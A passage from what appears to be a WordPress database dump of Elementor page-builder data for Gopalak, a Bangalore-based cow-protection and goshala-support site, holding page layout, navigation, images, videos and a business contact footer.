pavitra@gopalak.in\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(9266,1591,'_elementor_page_assets','a:0:{}'),(9269,1592,'_elementor_edit_mode','builder'),(9270,1592,'_elementor_template_type','wp-page'),(9271,1592,'_elementor_version','3.7.8'),(9272,1592,'_wp_page_template','elementor_canvas'),(9273,1592,'_elementor_data','[{\"id\":\"2bcecd0\",\"elType\":\"section\",\"settings\":{\"structure\":\"80\",\"background_background\":\"classic\",\"background_color\":\"#006505\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"08c3f0f\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"98c2def\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/Group-122.png\",\"id\":1543,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thaps-thumb-img\",\"image_custom_dimension\":{\"width\":\"150\",\"height\":\"150\"},\"link_to\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"3439158\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"f29b88a\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"049c5ad\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5af2fa6\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"59347f6\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"1609351\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"39fe47a\",\"elType\":\"widget\",\"settings\":{\"text\":\"Adobt\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/about-us\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"db735bc\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"27f86d0\",\"elType\":\"widget\",\"settings\":{\"text\":\"About us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/about-us\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b5a07d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"6a4419e\",\"elType\":\"widget\",\"settings\":{\"text\":\"Contact us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b366bab\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"4c45b22\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1fbbc13\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK555.png\",\"id\":1579,\"alt\":\"\",\"source\":\"library\"},\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"77\",\"left\":\"0\",\"isLinked\":false},\"background_slideshow_gallery\":[{\"id\":1357,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\"},{\"id\":1355,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\"},{\"id\":1356,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/abstract-background-wheat-farm-wallpaper-51701325.jpg\"}],\"background_repeat\":\"no-repeat\"},\"elements\":[{\"id\":\"945df22\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"104\",\"isLinked\":false}},\"elements\":[{\"id\":\"5a1c0c9\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-17\",\"bottom\":\"0\",\"left\":\"-27\",\"isLinked\":false}},\"elements\":[{\"id\":\"3ed0437\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":47.722999999999999,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-1\",\"bottom\":\"0\",\"left\":\"-67\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"892627f\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gopalak\",\"title_color\":\"#154833\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"600\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":3.1000000000000001,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"5c704bd\",\"elType\":\"widget\",\"settings\":{\"title\":\"Values\",\"align\":\"center\",\"title_color\":\"#154833\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"700\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":4.2000000000000002,\"sizes\":[]},\"typography_word_spacing\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fb27b52\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>In order to prevent the sinful act of killing cows or sending the cows to slaughter houses, as a small step towards protection of cows and to provide shelter for aged and unproductive cows.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"1795b3e\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"background_color\":\"#154833\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"26b984b\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":52.229999999999997,\"background_background\":\"classic\",\"margin\":{\"unit\":\"px\",\"top\":\"187\",\"right\":\"0\",\"bottom\":\"-40\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"5\",\"isLinked\":false}},\"elements\":[],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d5b9324\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e372b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ce9e678\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"623a672\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":976,\"sizes\":[]},\"structure\":\"40\"},\"elements\":[{\"id\":\"739cf25\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"background_background\":\"classic\",\"border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[{\"id\":\"d837b3b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"1536x1536\",\"thumbnail_custom_dimension\":{\"width\":\"1200\",\"height\":\"800\"},\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"text_align\":\"center\",\"title_bottom_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#3AB2A7\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"4b8356a\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"_margin\":{\"unit\":\"px\",\"top\":\"-21\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"4cb627c\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"background_background\":\"classic\"},\"elements\":[{\"id\":\"fafaf1c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"1536x1536\",\"thumbnail_custom_dimension\":{\"width\":\"1200\",\"height\":\"800\"},\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"text_align\":\"center\",\"title_bottom_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#4EB4AC\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"0775f80\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"_margin\":{\"unit\":\"px\",\"top\":\"-21\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5913281\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"f899190\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"1536x1536\",\"thumbnail_custom_dimension\":{\"width\":\"1200\",\"height\":\"800\"},\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"text_align\":\"center\",\"title_bottom_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#2EB7BC\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"8a4dc1c\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"_margin\":{\"unit\":\"px\",\"top\":\"-21\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5270078\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"6ac0016\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"1536x1536\",\"thumbnail_custom_dimension\":{\"width\":\"1200\",\"height\":\"800\"},\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"text_align\":\"center\",\"title_bottom_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#2EB7BC\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"9200df5\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"_margin\":{\"unit\":\"px\",\"top\":\"-21\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7107c53\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c67e6d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e70fe37\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"11aef9e\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":904,\"sizes\":[]},\"structure\":\"22\"},\"elements\":[{\"id\":\"2d9f268\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"86a6968\",\"elType\":\"widget\",\"settings\":{\"title\":\"About Gopalak\",\"title_color\":\"#264D5D\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"aa78264\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br \\/>Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"67983f0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8e299f1\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#324735\",\"_margin\":{\"unit\":\"px\",\"top\":\"49\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"23d3073\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"7d36be0\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e43f473\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":71,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1c1c876\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"background_background\":\"classic\",\"background_color\":\"#D8CDCD52\"},\"elements\":[{\"id\":\"4b90a4b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"dee4139\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=0wll4Km5AU8\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"97c7ffb\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f586793\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=bEyCT3KsAMQ\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"2f0ac23\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ec43a70\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=sVQg0-3WSc4\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ca8c599\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"f8ca017\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"da25a76\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"216af8d\",\"elType\":\"section\",\"settings\":{\"structure\":\"21\"},\"elements\":[{\"id\":\"882c92e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"772bd0e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gallery\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fbf7c50\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2c59178\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"29d5b45\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1340,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\"},{\"id\":1354,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\"},{\"id\":1339,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/cows-farming-on-green-meadow-260nw-1704884002-e1663753177624.webp\"},{\"id\":1355,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\"},{\"id\":1357,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\"}]},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f9dd695\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"0f89775\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"66d5270\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5d24ace\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK555.png\",\"id\":1579,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"00\",\"right\":\"100\",\"bottom\":\"80\",\"left\":\"100\",\"isLinked\":false},\"background_position\":\"initial\",\"background_ypos\":{\"unit\":\"px\",\"size\":-18,\"sizes\":[]}},\"elements\":[{\"id\":\"eb82b0e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"90\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"7af9c58\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gopalak Values\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"73daaad\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Service to all, Total integrity, Absolute commitment to quality, Respect and devotion to Mother Nature. No compromise on being who we are.<\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"6345fb6\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"background_color\":\"#FFAA00\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/about-us\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7410379\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#001B06\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"b43ead7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5282e6a\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6d3c6b7\",\"elType\":\"widget\",\"settings\":{\"title\":\" 800\\nvivdhity ventures<br>Second floor,  HSR Layout<br>Bangalore 560102<br>\\nContact : (+91)7411722844<br>\\nE-mail id: pavitra@gopalak.in\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(9274,1592,'_elementor_page_assets','a:0:{}'),(9276,1593,'_elementor_edit_mode','builder'),(9277,1593,'_elementor_template_type','wp-page'),(9278,1593,'_elementor_version','3.7.8'),(9279,1593,'_wp_page_template','elementor_canvas'),(9280,1593,'_elementor_data','[{\"id\":\"2bcecd0\",\"elType\":\"section\",\"settings\":{\"structure\":\"80\",\"background_background\":\"classic\",\"background_color\":\"#006505\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"08c3f0f\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"98c2def\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/Group-122.png\",\"id\":1543,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thaps-thumb-img\",\"image_custom_dimension\":{\"width\":\"150\",\"height\":\"150\"},\"link_to\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"3439158\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"f29b88a\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"049c5ad\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5af2fa6\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"59347f6\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"1609351\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"39fe47a\",\"elType\":\"widget\",\"settings\":{\"text\":\"Adobt\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/about-us\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"db735bc\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"27f86d0\",\"elType\":\"widget\",\"settings\":{\"text\":\"About us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/about-us\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b5a07d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"6a4419e\",\"elType\":\"widget\",\"settings\":{\"text\":\"Contact us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b366bab\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"4c45b22\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1fbbc13\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK555.png\",\"id\":1579,\"alt\":\"\",\"source\":\"library\"},\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"77\",\"left\":\"0\",\"isLinked\":false},\"background_slideshow_gallery\":[{\"id\":1357,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\"},{\"id\":1355,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\"},{\"id\":1356,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/abstract-background-wheat-farm-wallpaper-51701325.jpg\"}],\"background_repeat\":\"no-repeat\"},\"elements\":[{\"id\":\"945df22\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"104\",\"isLinked\":false}},\"elements\":[{\"id\":\"5a1c0c9\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-17\",\"bottom\":\"0\",\"left\":\"-27\",\"isLinked\":false}},\"elements\":[{\"id\":\"3ed0437\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":47.722999999999999,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-1\",\"bottom\":\"0\",\"left\":\"-67\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"892627f\",\"elType\":\"widget\",\"settings\":{\"title\":